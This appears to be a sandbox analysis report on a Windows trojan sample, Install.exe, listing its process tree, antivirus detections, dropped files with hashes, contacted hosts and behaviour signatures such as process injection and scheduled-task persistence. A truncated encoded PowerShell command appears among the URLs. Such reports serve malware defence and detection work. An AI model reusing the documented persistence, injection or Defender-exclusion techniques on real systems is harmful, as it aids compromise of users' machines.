System Information Discovery
SMB/Windows Admin Shares | 1
Clipboard Data
Automated Exfiltration | 2
Non-Application Layer Protocol
Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 11
Scheduled Task/Job
Logon Script (Mac) | Logon Script (Mac) | 22
Software Packing
NTDS | 1
Query Registry
Distributed Component Object Model | Input Capture | Scheduled Transfer | 2
Application Layer Protocol
SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | 1
PowerShell
Network Logon Script | Network Logon Script | 1
File Deletion
LSA Secrets | 23
Security Software Discovery
SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4
Rootkit
Cached Domain Credentials | 1
Process Discovery
VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 111
Masquerading
DCSync | 131
Virtualization/Sandbox Evasion
Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1
Modify Registry
Proc Filesystem | 1
Application Window Discovery
Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 131
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadow | 1
Remote System Discovery
Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1
Access Token Manipulation
Network Sniffing | 1
System Network Configuration Discovery
Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 512
Process Injection
Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | 1
Hidden Files and Directories
Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery
Behavior Graph ID: 597646 | Sample: Install.exe | Startdate: 27/03/2022 | Architecture: WINDOWS | Score: 100

Signatures on the sample:
  Multi AV Scanner detection for submitted file
  .NET source code contains potential unpacker
  .NET source code references suspicious native API functions
  8 other signatures

Process tree (dropped files, signatures and network contacts are listed under the process they belong to; the number in parentheses is the count shown next to the process in the graph):

Install.exe (9)
  dropped: C:\...\ChiefKeefofficialnaxyi_crypted(6).exe, PE32
  dropped: C:\Users\user\AppData\Roaming\34432.exe, PE32+
  34432.exe (5)
    dropped: C:\Users\user\AppData\Roaming\...\chrome.exe, PE32+
    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
    cmd.exe
      chrome.exe
        cmd.exe
          signature: Encrypted powershell cmdline option found
          powershell.exe
            signature: Found suspicious powershell code related to unpacking or dynamic code loading
          conhost.exe
      conhost.exe
    cmd.exe (1)
      signatures: Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules
      powershell.exe (19)
      powershell.exe (23)
      conhost.exe
    cmd.exe
      conhost.exe
      schtasks.exe
    nslookup.exe
  ChiefKeefofficialnaxyi_crypted(6).exe (1)
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    AppLaunch.exe (15 3)
      network: ip-api.com 208.95.112.1, port 49735 -> 80, TUT-AS, US (United States)
      signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    conhost.exe
powershell.exe
  signatures: Creates files in the system32 config directory; Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
  dllhost.exe
    signature: Creates a thread in another existing process (thread injection)
    5 other processes
  conhost.exe
chrome.exe
  signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  cmd.exe
    signature: Encrypted powershell cmdline option found
    powershell.exe
      signature: Found suspicious powershell code related to unpacking or dynamic code loading
    conhost.exe
powershell.exe
  signature: Found suspicious powershell code related to unpacking or dynamic code loading
  conhost.exe

Source | Detection | Scanner | Label
Install.exe | 41% | Virustotal |
Install.exe | 73% | ReversingLabs | Win32.Trojan.Zenpak

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\34432.exe | 100% | Avira | HEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\Chrome\chrome.exe | 100% | Avira | HEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\34432.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Chrome\chrome.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\34432.exe | 35% | Virustotal |
C:\Users\user\AppData\Roaming\34432.exe | 77% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe | 50% | Virustotal |
C:\Users\user\AppData\Roaming\Chrome\chrome.exe | 77% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi

Source | Detection | Scanner | Label
22.0.nslookup.exe.140000000.2.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.10.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.0.unpack | 100% | Avira | TR/Injector.vwktt
22.0.nslookup.exe.140000000.8.unpack | 100% | Avira | TR/Injector.vwktt
2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
39.0.dllhost.exe.140000000.3.unpack | 100% | Avira | RKIT/Agent.avskt
33.2.chrome.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
22.0.nslookup.exe.140000000.1.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.4.unpack | 100% | Avira | RKIT/Agent.avskt
30.2.chrome.exe.20000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
30.0.chrome.exe.20000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
22.0.nslookup.exe.140000000.5.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.1.unpack | 100% | Avira | RKIT/Agent.avskt
39.0.dllhost.exe.140000000.8.unpack | 100% | Avira | RKIT/Agent.avskt
4.0.34432.exe.770000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
22.2.nslookup.exe.140000000.0.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.5.unpack | 100% | Avira | RKIT/Agent.avskt
33.0.chrome.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
5.2.AppLaunch.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
4.2.34432.exe.770000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
39.2.dllhost.exe.140000000.0.unpack | 100% | Avira | RKIT/Agent.avskt
39.0.dllhost.exe.140000000.12.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.6.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.0.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.10.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.6.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.12.unpack | 100% | Avira | TR/Injector.vwktt
22.0.nslookup.exe.140000000.3.unpack | 100% | Avira | TR/Injector.vwktt
22.0.nslookup.exe.140000000.4.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.2.unpack | 100% | Avira | RKIT/Agent.avskt
No Antivirus matches
Source | Detection | Scanner | Label
http://ip-api.com4Uk | 0% | Avira URL Cloud | safe
http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM | 0% | Avira URL Cloud | safe
http://crl.mp | 0% | Virustotal |
http://crl.mp | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://ip-api.com4Uk | AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM | powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.mp | powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.codeplex.com/DotNetZip | AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:597646
                          Start date and time:2022-03-27 00:39:51 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Install.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:46
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:5
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@44/26@1/1
                          EGA Information:
                          • Successful, ratio: 57.1%
                          HDC Information:
                          • Successful, ratio: 51.9% (good quality ratio 43.1%)
                          • Quality average: 58.5%
                          • Quality standard deviation: 36.7%
                          HCA Information:
                          • Successful, ratio: 71%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.242.101.226, 40.125.122.176, 20.54.110.249, 52.152.110.14
                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Execution Graph export aborted for target 34432.exe, PID 6836 because it is empty
                          • Execution Graph export aborted for target chrome.exe, PID 5460 because it is empty
                          • Execution Graph export aborted for target chrome.exe, PID 6564 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 6940 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
01:41:04 | API Interceptor | 123x Sleep call for process: powershell.exe modified
01:41:33 | API Interceptor | 2x Sleep call for process: 34432.exe modified
01:41:47 | Task Scheduler | Run new task: chrome path: C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):973
                          Entropy (8bit):5.374440234733254
                          Encrypted:false
                          SSDEEP:12:Q3La/hVAWDLI4MWuCqDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0Q:MLqE4K5E4KrL1qE4GiD0E4KeGasXE4+Y
                          MD5:06639220FD6B2DCCDA25EAE889B6BCC8
                          SHA1:3EDFCBE94838702A978D3D518B2358560A296FD0
                          SHA-256:32F1B0CAE8509079F3F044C5655800CD760DB66E792B451DF2C919B6129DCB83
                          SHA-512:61EBE07C66BA18BE8838223D7946EA14DAF46CE3CEB1F27A59958857B22F00E2EF872A56D7D05C58747D57558BD07D4B097B604CA34D280B6761F3024A20A53F
                          Malicious:false
                          Reputation:unknown
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):18817
                          Entropy (8bit):5.004929862695359
                          Encrypted:false
                          SSDEEP:384:Kwib4LEVoGIpN6KQkj2jkjh4iUxLzp0ifOdBVNXp5xvOjJpYoY4Qib4w:KEEV3IpNBQkj22h4iUxLzp0ifOdBVNZY
                          MD5:DA4B150893016C59B1E5DE988406A425
                          SHA1:9CAF9C1A8F844A0FA8D88DC30F29BE7B023E7079
                          SHA-256:5107772D1007FD535B026DF52ADF8864E7C2D4C1ACAB3CD03A5C112517A426DF
                          SHA-512:533A894A8EBB39BF2D785C8E715615A994DF6D797650FCD1D7A3949C90F2682B24BFA596BD2CED15B7BA8817483E68D96D968AC64D784176D53584A116ECEDE0
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1292
                          Entropy (8bit):5.362943121948868
                          Encrypted:false
                          SSDEEP:24:3vUrcPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9b6F:8wPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                          MD5:12513EC7250BFC953C71EA941E82B42C
                          SHA1:F821E6EF80B3144841A0385A593C2605978BAD45
                          SHA-256:91249CB24DDFEB9DC31A3EACB04449E3422C6EB754265D23C897A413EFB62592
                          SHA-512:71B09E3B079329EB741B2ACF89C28870EB225EC51DA34CDB01BE31430272892E00F134B66F6FCF1F0D5AD5368FB20554F9C512794D84BE3015388A63195403E2
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...................................R............@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: Virustotal, Detection: 35%, Browse
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
